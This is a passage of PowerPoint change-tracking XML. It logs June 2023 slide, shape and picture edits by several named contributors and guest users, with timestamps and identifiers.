          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:09:50.020" v="5896" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="853415426" sldId="320"/>
            <ac:spMk id="3" creationId="{73746499-B6AD-2899-4E09-356224C0312A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:09:56.469" v="5899" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="853415426" sldId="320"/>
            <ac:picMk id="4" creationId="{ECD04574-0484-571A-C379-67F1722E7753}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:22:28.823" v="6231" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="55556707" sldId="321"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:21:22.965" v="6226" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="55556707" sldId="321"/>
            <ac:spMk id="2" creationId="{0DC27581-8544-E18C-B561-BDFFC43F2C62}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:22:28.823" v="6231" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="55556707" sldId="321"/>
            <ac:spMk id="4" creationId="{DDC62F0E-E8AD-0E20-9F17-539ECD735F1C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:22:25.109" v="6230" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="55556707" sldId="321"/>
            <ac:picMk id="5" creationId="{E51A6049-4A82-46D7-D5E5-E2E119CD100E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:28:38.278" v="6544" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2892817202" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:23:10.377" v="6254" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2892817202" sldId="322"/>
            <ac:spMk id="2" creationId="{5854B5C9-76A8-FEEF-F14B-697C39DD8451}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:23:13.085" v="6255" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2892817202" sldId="322"/>
            <ac:spMk id="3" creationId="{35E54EB4-F009-55B7-1493-1D3138E96BD1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:28:38.278" v="6544" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2892817202" sldId="322"/>
            <ac:graphicFrameMk id="4" creationId="{2D9C9EAD-798E-8CBD-2130-5EB0B880EE4F}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:34:25.953" v="6649" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2324803796" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:34:25.953" v="6649" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2324803796" sldId="323"/>
            <ac:spMk id="4" creationId="{884A9D47-384D-23E1-08E6-ABB300232067}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:41:24.274" v="6689" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2669355722" sldId="333"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:41:24.274" v="6689" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2669355722" sldId="333"/>
            <ac:spMk id="3" creationId="{CA0C3C6D-8B6E-C2CD-8D3F-4E6A9BFE6499}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:42:03.161" v="6696" actId="20578"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4180975761" sldId="334"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:41:56.980" v="6695" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4180975761" sldId="334"/>
            <ac:spMk id="2" creationId="{D6D64693-65DD-32B7-15C8-DEEFF29A9A9E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:39:25.622" v="6790" actId="2085"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1306779018" sldId="335"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:36:42.567" v="6783" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1306779018" sldId="335"/>
            <ac:spMk id="2" creationId="{2F4D3DCE-2A0A-F04B-44C5-83291525A92C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:39:25.622" v="6790" actId="2085"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1306779018" sldId="335"/>
            <ac:spMk id="4" creationId="{024DC722-D8F5-70E4-6163-633BD0C8D8F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:39:06.334" v="6787" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1306779018" sldId="335"/>
            <ac:picMk id="3" creationId="{221E20D7-E91E-F529-64CF-908742D5D691}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:40:04.217" v="6800" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="489427030" sldId="336"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:39:34.840" v="6793" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="489427030" sldId="336"/>
            <ac:spMk id="4" creationId="{024DC722-D8F5-70E4-6163-633BD0C8D8F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:40:04.217" v="6800" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="489427030" sldId="336"/>
            <ac:spMk id="6" creationId="{36DB9612-68D2-78C4-DBC9-53B07C067FF4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:39:34.151" v="6792" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="489427030" sldId="336"/>
            <ac:picMk id="3" creationId="{221E20D7-E91E-F529-64CF-908742D5D691}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:39:53.868" v="6796" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="489427030" sldId="336"/>
            <ac:picMk id="5" creationId="{BB46A325-26C3-0A99-B211-07655D0CEC75}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:49:54.883" v="6810" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="747257412" sldId="337"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:49:54.883" v="6810" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747257412" sldId="337"/>
            <ac:spMk id="2" creationId="{37133BF2-4D9A-8C7E-2C3E-1EDAAABF14EC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:49:46.551" v="6809" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747257412" sldId="337"/>
            <ac:picMk id="3" creationId="{B4E4C4AD-D011-B0A6-AEC5-6BE3C336C3BD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:49:40.947" v="6806" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747257412" sldId="337"/>
            <ac:picMk id="4" creationId="{A6ADE9A0-0CD8-5CB4-6151-C555C1B6EF8D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="來賓使用者" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}"/>
    <pc:docChg chg="addSld modSld modSection">
      <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}" dt="2023-06-07T10:21:36.439" v="5"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}" dt="2023-06-07T10:19:43.530" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="537350369" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}" dt="2023-06-07T10:19:43.530" v="1"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="537350369" sldId="310"/>
            <ac:spMk id="3" creationId="{11FF1341-FDC6-0005-57F1-FAA0F920DF35}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}" dt="2023-06-07T10:19:43.530" v="1"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="537350369" sldId="310"/>
            <ac:picMk id="4" creationId="{9249EE63-AF81-C360-5D39-AB5A9FDF0076}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}" dt="2023-06-07T10:20:37.672" v="3"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2782313058" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}" dt="2023-06-07T10:20:37.672" v="3"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2782313058" sldId="311"/>
            <ac:spMk id="3" creationId="{DB497568-A9AF-4610-D449-BBB94A09F5A3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}" dt="2023-06-07T10:20:37.672" v="3"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2782313058" sldId="311"/>
            <ac:picMk id="4" creationId="{A832E177-D634-546F-8594-5832CE63D901}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}" dt="2023-06-07T10:21:36.439" v="5"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4028775241" sldId="312"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}" dt="2023-06-07T10:21:36.439" v="5"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4028775241" sldId="312"/>
            <ac:spMk id="3" creationId="{10ADC089-B4CC-F53A-C499-1EBAD0AC9622}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{D7FA6C88-9D8F-4414-BBE1-4EAD6C17EC08}" dt="2023-06-07T10:21:36.439" v="5"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4028775241" sldId="312"/>
            <ac:picMk id="4" creationId="{03B6A60C-E9BB-2F8F-8123-D604248A6FFD}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="來賓使用者" providerId="Windows Live" clId="Web-{B511E997-077A-48A9-8B65-B0227B3B15A2}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{B511E997-077A-48A9-8B65-B0227B3B15A2}" dt="2023-06-12T10:20:47.942" v="115" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{B511E997-077A-48A9-8B65-B0227B3B15A2}" dt="2023-06-12T10:20:47.942" v="115" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1191282374" sldId="319"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{B511E997-077A-48A9-8B65-B0227B3B15A2}" dt="2023-06-12T10:20:47.942" v="115" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1191282374" sldId="319"/>
            <ac:spMk id="5" creationId="{9DCF0554-7BC2-9FCC-9014-6FF3566C60B8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="來賓使用者" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}"/>
    <pc:docChg chg="addSld delSld modSld sldOrd modSection">
      <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:48:05.497" v="467" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:15:48.661" v="337" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1279794145" sldId="288"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:08:34.085" v="179"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1279794145" sldId="288"/>
            <ac:spMk id="2" creationId="{C2E928E3-2D35-B1D2-322E-474108132668}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T09:41:12.614" v="18" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1279794145" sldId="288"/>
            <ac:spMk id="4" creationId="{5433D402-CAF3-44D8-D294-96ECB4E85C2D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:15:48.661" v="337" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1279794145" sldId="288"/>
            <ac:spMk id="5" creationId="{2926D49C-8FBB-278C-47C6-851CC0DEC0BF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp ord">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:39:16.611" v="426" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3325207406" sldId="301"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:16:59.131" v="347" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3325207406" sldId="301"/>
            <ac:spMk id="4" creationId="{0E97811E-4F4D-9A07-E643-1B3124290C26}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:39:16.611" v="426" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3325207406" sldId="301"/>
            <ac:spMk id="5" creationId="{4ECA0A2C-276D-F49E-31D8-112A665FE414}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:40:08.050" v="428" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2020120747" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:40:08.050" v="428" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2020120747" sldId="306"/>
            <ac:spMk id="2" creationId="{37133BF2-4D9A-8C7E-2C3E-1EDAAABF14EC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:41:27.645" v="437" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3109765984" sldId="307"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:41:27.645" v="437" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3109765984" sldId="307"/>
            <ac:spMk id="4" creationId="{95489F51-ECA4-CAFF-B913-ABAF356AFE32}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add replId">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:32:55.494" v="391" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1423290170" sldId="318"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:19:37.009" v="351" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1423290170" sldId="318"/>
            <ac:spMk id="2" creationId="{2045698B-21F3-9300-21E7-B823738F5273}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:32:55.494" v="391" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1423290170" sldId="318"/>
            <ac:spMk id="3" creationId="{3AC184D8-9432-0073-E565-DE6B02F165E5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T09:42:15.177" v="20"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1915061372" sldId="318"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:48:05.497" v="467" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1191282374" sldId="319"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:45:50.104" v="441" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1191282374" sldId="319"/>
            <ac:spMk id="4" creationId="{0E97811E-4F4D-9A07-E643-1B3124290C26}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:48:05.497" v="467" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1191282374" sldId="319"/>
            <ac:spMk id="5" creationId="{9DCF0554-7BC2-9FCC-9014-6FF3566C60B8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{82D106A3-AB97-4F64-B11D-058B5741C35F}" dt="2023-06-08T10:45:27.729" v="439"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1191282374" sldId="319"/>
            <ac:picMk id="2" creationId="{FC7E8E79-A6AB-C453-0686-29174DC3F09C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="來賓使用者" providerId="Windows Live" clId="Web-{F86B0F4B-8133-48A3-9954-8819F6D99E3D}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{F86B0F4B-8133-48A3-9954-8819F6D99E3D}" dt="2023-06-12T10:21:53.773" v="2" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{F86B0F4B-8133-48A3-9954-8819F6D99E3D}" dt="2023-06-12T10:21:53.773" v="2" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1191282374" sldId="319"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="來賓使用者" userId="" providerId="Windows Live" clId="Web-{F86B0F4B-8133-48A3-9954-8819F6D99E3D}" dt="2023-06-12T10:21:53.773" v="2" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1191282374" sldId="319"/>
            <ac:spMk id="5" creationId="{9DCF0554-7BC2-9FCC-9014-6FF3566C60B8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}"/>
    <pc:docChg chg="addSld modSld sldOrd modSection">
      <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:25:17.285" v="449" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
